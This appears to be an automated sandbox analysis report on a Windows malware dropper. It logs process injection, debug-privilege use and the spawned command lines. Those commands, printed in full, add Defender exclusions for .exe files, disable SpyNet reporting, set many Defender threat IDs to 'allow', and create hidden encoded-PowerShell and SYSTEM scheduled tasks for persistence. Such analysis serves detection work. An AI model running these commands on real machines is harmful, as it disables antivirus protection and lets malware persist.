N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1712 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6.exe C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe
PID 1712 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6.exe C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe
PID 1712 wrote to memory of 784 N/A C:\Users\Admin\AppData\Local\Temp\cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6.exe C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe
PID 784 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 784 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 784 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 784 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 784 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 784 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4332 wrote to memory of 4216 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4332 wrote to memory of 4216 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4332 wrote to memory of 4216 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4216 wrote to memory of 6104 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4216 wrote to memory of 6104 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4216 wrote to memory of 6104 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2404 wrote to memory of 4608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2404 wrote to memory of 4608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2404 wrote to memory of 4608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4216 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4216 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4216 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4608 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4608 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4608 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4608 wrote to memory of 3956 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4608 wrote to memory of 3956 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4608 wrote to memory of 3956 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 784 wrote to memory of 3556 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 784 wrote to memory of 3556 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 784 wrote to memory of 3556 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 784 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 784 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 784 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 344 wrote to memory of 5892 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 344 wrote to memory of 5892 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 784 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 784 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 784 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 784 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 784 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 784 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4244 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\HPSMzKd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4244 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\HPSMzKd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4244 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\HPSMzKd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2748 wrote to memory of 64 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2748 wrote to memory of 64 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2748 wrote to memory of 64 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 64 wrote to memory of 5668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 64 wrote to memory of 5668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 64 wrote to memory of 5668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2748 wrote to memory of 4812 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2748 wrote to memory of 4812 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2748 wrote to memory of 4812 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2748 wrote to memory of 4676 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2748 wrote to memory of 4676 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2748 wrote to memory of 4676 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2748 wrote to memory of 2348 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2748 wrote to memory of 2348 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2748 wrote to memory of 2348 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2748 wrote to memory of 2460 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2748 wrote to memory of 2460 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2748 wrote to memory of 2460 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2748 wrote to memory of 1688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2748 wrote to memory of 1688 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6.exe

"C:\Users\Admin\AppData\Local\Temp\cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6.exe"

C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe

.\Install.exe /dEKGWdidYWnQ "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gjzDJYWGS" /SC once /ST 08:27:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gjzDJYWGS"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gjzDJYWGS"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bCAdHbOFiqtMCRhbmR" /SC once /ST 11:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\HPSMzKd.exe\" hl /Fksite_idfNB 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\HPSMzKd.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\HPSMzKd.exe hl /Fksite_idfNB 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

